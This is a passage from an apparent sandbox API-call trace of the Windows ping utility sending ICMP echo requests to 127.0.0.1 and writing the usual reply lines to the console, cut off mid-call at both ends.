cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0094.214] _fileno (_File=0x76ea4c28) returned 1 [0094.214] _write (in: _FileHandle=1, _Buf=0xb1c138*, _MaxCharCount=0x18 | out: _Buf=0xb1c138*) returned 24 [0094.214] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0094.214] _fileno (_File=0x76ea4c28) returned 1 [0094.214] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0094.214] LocalFree (hMem=0xb1c138) returned 0x0 [0094.214] LocalFree (hMem=0xb27ac8) returned 0x0 [0094.214] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0094.214] IcmpSendEcho2Ex (in: IcmpHandle=0xb16a68, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xb1c2f0, RequestSize=0x20, RequestOptions=0x72ef3c, ReplyBuffer=0xb25270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xb25270) returned 0x1 [0094.215] InetNtopW (in: Family=2, pAddr=0x72ef2c, pStringBuf=0x72f054, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0094.215] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x72eec0, nSize=0x0, Arguments=0x72eebc | out: lpBuffer="笈²r⛔\x94䰨盪✣") returned 0x16 [0094.215] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0094.215] _fileno (_File=0x76ea4c28) returned 1 [0094.215] _get_osfhandle (_FileHandle=1) returned 0x28 [0094.215] GetFileType (hFile=0x28) returned 0x2 [0094.215] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x72ee84 | out: lpMode=0x72ee84) returned 0 [0094.215] GetLastError () returned 0x6 [0094.216] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x72ede8, nSize=0x50 | out: lpBuffer="r✣") returned 0x0 [0094.216] _fileno (_File=0x76ea4c28) returned 1 [0094.216] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0094.216] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0094.216] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xb27b40 [0094.216] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xb27b40, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0094.216] _fileno (_File=0x76ea4c28) returned 1 [0094.216] _write (in: _FileHandle=1, _Buf=0xb27b40*, _MaxCharCount=0x16 | out: _Buf=0xb27b40*) returned 22 [0094.216] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0094.216] _fileno (_File=0x76ea4c28) returned 1 [0094.216] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0094.216] LocalFree (hMem=0xb27b40) returned 0x0 [0094.216] LocalFree (hMem=0xb27b08) returned 0x0 [0094.216] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x72eec0, nSize=0x0, Arguments=0x72eebc | out: lpBuffer="笈²r⛿\x94䰨盪✼") returned 0x9 [0094.216] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0094.216] _fileno (_File=0x76ea4c28) returned 1 [0094.216] _get_osfhandle (_FileHandle=1) returned 0x28 [0094.216] GetFileType (hFile=0x28) returned 0x2 [0094.216] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x72ee84 | out: lpMode=0x72ee84) returned 0 [0094.216] GetLastError () returned 0x6 [0094.216] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x72ede8, nSize=0x50 | out: lpBuffer="r✼") returned 0x0 [0094.216] _fileno (_File=0x76ea4c28) returned 1 [0094.216] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0094.216] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.216] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xb18ac0 [0094.216] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xb18ac0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0094.216] _fileno (_File=0x76ea4c28) returned 1 [0094.216] _write (in: _FileHandle=1, _Buf=0xb18ac0*, _MaxCharCount=0x9 | out: _Buf=0xb18ac0*) returned 9 [0094.216] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0094.216] _fileno (_File=0x76ea4c28) returned 1 [0094.216] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0094.216] LocalFree (hMem=0xb18ac0) returned 0x0 [0094.216] LocalFree (hMem=0xb27b08) returned 0x0 [0094.216] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x72eec4, nSize=0x0, Arguments=0x72eec0 | out: lpBuffer="箐²r➷\x94䰨盪✧") returned 0x9 [0094.216] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0094.216] _fileno (_File=0x76ea4c28) returned 1 [0094.216] _get_osfhandle (_FileHandle=1) returned 0x28 [0094.217] GetFileType (hFile=0x28) returned 0x2 [0094.217] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x72ee88 | out: lpMode=0x72ee88) returned 0 [0094.217] GetLastError () returned 0x6 [0094.217] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x72edec, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0094.217] _fileno (_File=0x76ea4c28) returned 1 [0094.217] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0094.217] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.217] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xb18ac0 [0094.217] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xb18ac0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0094.217] _fileno (_File=0x76ea4c28) returned 1 [0094.217] _write (in: _FileHandle=1, _Buf=0xb18ac0*, _MaxCharCount=0x9 | out: _Buf=0xb18ac0*) returned 9 [0094.217] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0094.217] _fileno (_File=0x76ea4c28) returned 1 [0094.217] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0094.217] LocalFree (hMem=0xb18ac0) returned 0x0 [0094.217] LocalFree (hMem=0xb27b90) returned 0x0 [0094.217] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x72eec0, nSize=0x0, Arguments=0x72eebc | out: lpBuffer="耀²r⟘\x94䰨盪✨") returned 0x9 [0094.217] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0094.217] _fileno (_File=0x76ea4c28) returned 1 [0094.217] _get_osfhandle (_FileHandle=1) returned 0x28 [0094.217] GetFileType (hFile=0x28) returned 0x2 [0094.217] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x72ee84 | out: lpMode=0x72ee84) returned 0 [0094.217] GetLastError () returned 0x6 [0094.217] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x72ede8, nSize=0x50 | out: lpBuffer="r✨") returned 0x0 [0094.217] _fileno (_File=0x76ea4c28) returned 1 [0094.217] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0094.217] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.217] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xb18ac0 [0094.217] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xb18ac0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0094.217] _fileno (_File=0x76ea4c28) returned 1 [0094.217] _write (in: _FileHandle=1, _Buf=0xb18ac0*, _MaxCharCount=0x9 | out: _Buf=0xb18ac0*) returned 9 [0094.217] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0094.217] _fileno (_File=0x76ea4c28) returned 1 [0094.217] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0094.217] LocalFree (hMem=0xb18ac0) returned 0x0 [0094.217] LocalFree (hMem=0xb28000) returned 0x0 [0094.218] Sleep (dwMilliseconds=0x3e8) [0095.218] IcmpSendEcho2Ex (in: IcmpHandle=0xb16a68, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xb1c2f0, RequestSize=0x20, RequestOptions=0x72ef3c, ReplyBuffer=0xb25270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xb25270) returned 0x1 [0095.219] InetNtopW (in: Family=2, pAddr=0x72ef2c, pStringBuf=0x72f054, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0095.219] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x72eec0, nSize=0x0, Arguments=0x72eebc | out: lpBuffer="竨²r⛔\x94䰨盪✣") returned 0x16 [0095.219] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0095.219] _fileno (_File=0x76ea4c28) returned 1 [0095.219] _get_osfhandle (_FileHandle=1) returned 0x28 [0095.219] GetFileType (hFile=0x28) returned 0x2 [0095.219] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x72ee84 | out: lpMode=0x72ee84) returned 0 [0095.219] GetLastError () returned 0x6 [0095.219] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x72ede8, nSize=0x50 | out: lpBuffer="r✣") returned 0x0 [0095.219] _fileno (_File=0x76ea4c28) returned 1 [0095.219] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0095.219] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0095.219] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xb27b90 [0095.219] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xb27b90, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0095.220] _fileno (_File=0x76ea4c28) returned 1 [0095.220] _write (in: _FileHandle=1, _Buf=0xb27b90*, _MaxCharCount=0x16 | out: _Buf=0xb27b90*) returned 22 [0095.220] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0095.220] _fileno (_File=0x76ea4c28) returned 1 [0095.220] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0095.220] LocalFree (hMem=0xb27b90) returned 0x0 [0095.220] LocalFree (hMem=0xb27ae8) returned 0x0 [0095.220] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x72eec0, nSize=0x0, Arguments=0x72eebc | out: lpBuffer="耀²r⛿\x94䰨盪✼") returned 0x9 [0095.220] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0095.220] _fileno (_File=0x76ea4c28) returned 1 [0095.220] _get_osfhandle (_FileHandle=1) returned 0x28 [0095.220] GetFileType (hFile=0x28) returned 0x2 [0095.220] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x72ee84 | out: lpMode=0x72ee84) returned 0 [0095.220] GetLastError () returned 0x6 [0095.220] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x72ede8, nSize=0x50 | out: lpBuffer="r✼") returned 0x0 [0095.220] _fileno (_File=0x76ea4c28) returned 1 [0095.220] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0095.220] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.220] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xb189a0 [0095.220] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xb189a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0095.220] _fileno (_File=0x76ea4c28) returned 1 [0095.220] _write (in: _FileHandle=1, _Buf=0xb189a0*, _MaxCharCount=0x9 | out: _Buf=0xb189a0*) returned 9 [0095.220] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0095.220] _fileno (_File=0x76ea4c28) returned 1 [0095.220] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0095.220] LocalFree (hMem=0xb189a0) returned 0x0 [0095.220] LocalFree (hMem=0xb28000) returned 0x0 [0095.220] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x72eec4, nSize=0x0, Arguments=0x72eec0 | out: lpBuffer="耀²r➷\x94䰨盪✧") returned 0x9 [0095.220] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0095.220] _fileno (_File=0x76ea4c28) returned 1 [0095.220] _get_osfhandle (_FileHandle=1) returned 0x28 [0095.220] GetFileType (hFile=0x28) returned 0x2 [0095.220] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x72ee88 | out: lpMode=0x72ee88) returned 0 [0095.220] GetLastError () returned 0x6 [0095.220] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x72edec, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0095.220] _fileno (_File=0x76ea4c28) returned 1 [0095.220] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0095.220] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.220] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xb18958 [0095.220] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xb18958, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0095.220] _fileno (_File=0x76ea4c28) returned 1 [0095.220] _write (in: _FileHandle=1, _Buf=0xb18958*, _MaxCharCount=0x9 | out: _Buf=0xb18958*) returned 9 [0095.220] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0095.220] _fileno (_File=0x76ea4c28) returned 1 [0095.220] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0095.220] LocalFree (hMem=0xb18958) returned 0x0 [0095.220] LocalFree (hMem=0xb28000) returned 0x0 [0095.220] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x72eec0, nSize=0x0, Arguments=0x72eebc | out: lpBuffer="耀²r⟘\x94䰨盪✨") returned 0x9 [0095.220] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0095.220] _fileno (_File=0x76ea4c28) returned 1 [0095.220] _get_osfhandle (_FileHandle=1) returned 0x28 [0095.220] GetFileType (hFile=0x28) returned 0x2 [0095.221] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x72ee84 | out: lpMode=0x72ee84) returned 0 [0095.221] GetLastError () returned 0x6 [0095.221] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x72ede8, nSize=0x50 | out: lpBuffer="r✨") returned 0x0 [0095.221] _fileno (_File=0x76ea4c28) returned 1 [0095.221] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0095.221] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0095.221] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xb18ac0 [0095.221] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xb18ac0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0095.221] _fileno (_File=0x76ea4c28) returned 1 [0095.221] _write (in: _FileHandle=1, _Buf=0xb18ac0*, _MaxCharCount=0x9 | out: _Buf=0xb18ac0*) returned 9 [0095.221] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0095.221] _fileno (_File=0x76ea4c28) returned 1 [0095.221] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0095.221] LocalFree (hMem=0xb18ac0) returned 0x0 [0095.221] LocalFree (hMem=0xb28000) returned 0x0 [0095.221] Sleep (dwMilliseconds=0x3e8) [0096.224] IcmpSendEcho2Ex (in: IcmpHandle=0xb16a68, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xb1c2f0, RequestSize=0x20, RequestOptions=0x72ef3c, ReplyBuffer=0xb25270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xb25270) returned 0x1 [0096.225] InetNtopW (in: Family=2, pAddr=0x72ef2c, pStringBuf=0x72f054, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0096.225] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x72eec0, nSize=0x0, Arguments=0x72eebc | out: lpBuffer="竨²r⛔\x94䰨盪✣") returned 0x16 [0096.225] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0096.225] _fileno (_File=0x76ea4c28) returned 1 [0096.225] _get_osfhandle (_FileHandle=1) returned 0x28 [0096.225] GetFileType (hFile=0x28) returned 0x2 [0096.225] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x72ee84 | out: lpMode=0x72ee84) returned 0 [0096.225] GetLastError () returned 0x6 [0096.225] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x72ede8, nSize=0x50 | out: lpBuffer="r✣") returned 0x0 [0096.225] _fileno (_File=0x76ea4c28) returned 1 [0096.225] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0096.225] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0096.225] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xb27b90 [0096.225] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xb27b90, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0096.225] _fileno (_File=0x76ea4c28) returned 1 [0096.225] _write (in: _FileHandle=1, _Buf=0xb27b90*, _MaxCharCount=0x16 | out: _Buf=0xb27b90*) returned 22 [0096.225] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0096.225] _fileno (_File=0x76ea4c28) returned 1 [0096.225] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0096.225] LocalFree (hMem=0xb27b90) returned 0x0 [0096.225] LocalFree (hMem=0xb27ae8) returned 0x0 [0096.225] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0x72eec0, nSize=0x0, Arguments=0x72eebc | out: lpBuffer="耀²r⛿\x94䰨盪✼") returned 0x9 [0096.225] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0096.225] _fileno (_File=0x76ea4c28) returned 1 [0096.225] _get_osfhandle (_FileHandle=1) returned 0x28 [0096.225] GetFileType (hFile=0x28) returned 0x2 [0096.225] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x72ee84 | out: lpMode=0x72ee84) returned 0 [0096.225] GetLastError () returned 0x6 [0096.225] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x72ede8, nSize=0x50 | out: lpBuffer="r✼") returned 0x0 [0096.225] _fileno (_File=0x76ea4c28) returned 1 [0096.225] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0096.225] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.225] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xb18958 [0096.225] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xb18958, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0096.225] _fileno (_File=0x76ea4c28) returned 1 [0096.225] _write (in: _FileHandle=1, _Buf=0xb18958*, _MaxCharCount=0x9 | out: _Buf=0xb18958*) returned 9 [0096.225] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0096.225] _fileno (_File=0x76ea4c28) returned 1 [0096.226] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0096.226] LocalFree (hMem=0xb18958) returned 0x0 [0096.226] LocalFree (hMem=0xb28000) returned 0x0 [0096.226] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x72eec4, nSize=0x0, Arguments=0x72eec0 | out: lpBuffer="耀²r➷\x94䰨盪✧") returned 0x9 [0096.226] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0096.226] _fileno (_File=0x76ea4c28) returned 1 [0096.226] _get_osfhandle (_FileHandle=1) returned 0x28 [0096.226] GetFileType (hFile=0x28) returned 0x2 [0096.226] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x72ee88 | out: lpMode=0x72ee88) returned 0 [0096.226] GetLastError () returned 0x6 [0096.226] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x72edec, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0096.226] _fileno (_File=0x76ea4c28) returned 1 [0096.226] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0096.226] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.226] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xb18ac0 [0096.226] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xb18ac0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0096.226] _fileno (_File=0x76ea4c28) returned 1 [0096.226] _write (in: _FileHandle=1, _Buf=0xb18ac0*, _MaxCharCount=0x9 | out: _Buf=0xb18ac0*) returned 9 [0096.226] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0096.226] _fileno (_File=0x76ea4c28) returned 1 [0096.226] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0096.226] LocalFree (hMem=0xb18ac0) returned 0x0 [0096.226] LocalFree (hMem=0xb28000) returned 0x0 [0096.226] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0x72eec0, nSize=0x0, Arguments=0x72eebc | out: lpBuffer="耀²r⟘\x94䰨盪✨") returned 0x9 [0096.226] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0096.226] _fileno (_File=0x76ea4c28) returned 1 [0096.226] _get_osfhandle (_FileHandle=1) returned 0x28 [0096.226] GetFileType (hFile=0x28) returned 0x2 [0096.226] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x72ee84 | out: lpMode=0x72ee84) returned 0 [0096.226] GetLastError () returned 0x6 [0096.226] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0x72ede8, nSize=0x50 | out: lpBuffer="r✨") returned 0x0 [0096.226] _fileno (_File=0x76ea4c28) returned 1 [0096.226] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0096.226] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.226] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xb18958 [0096.226] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xb18958, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0096.226] _fileno (_File=0x76ea4c28) returned 1 [0096.226] _write (in: _FileHandle=1, _Buf=0xb18958*, _MaxCharCount=0x9 | out: _Buf=0xb18958*) returned 9 [0096.226] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0096.226] _fileno (_File=0x76ea4c28) returned 1 [0096.226] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0096.226] LocalFree (hMem=0xb18958) returned 0x0 [0096.226] LocalFree (hMem=0xb28000) returned 0x0 [0096.226] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0x72ee48, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0096.226] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x72ee1c, nSize=0x0, Arguments=0x72ee18 | out: lpBuffer="耀²r᧰\x94䰨盪❏") returned 0x5c [0096.226] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0096.226] _fileno (_File=0x76ea4c28) returned 1 [0096.226] _get_osfhandle (_FileHandle=1) returned 0x28 [0096.226] GetFileType (hFile=0x28) returned 0x2 [0096.227] GetConsoleMode (in: hConsoleHandle=0x28, 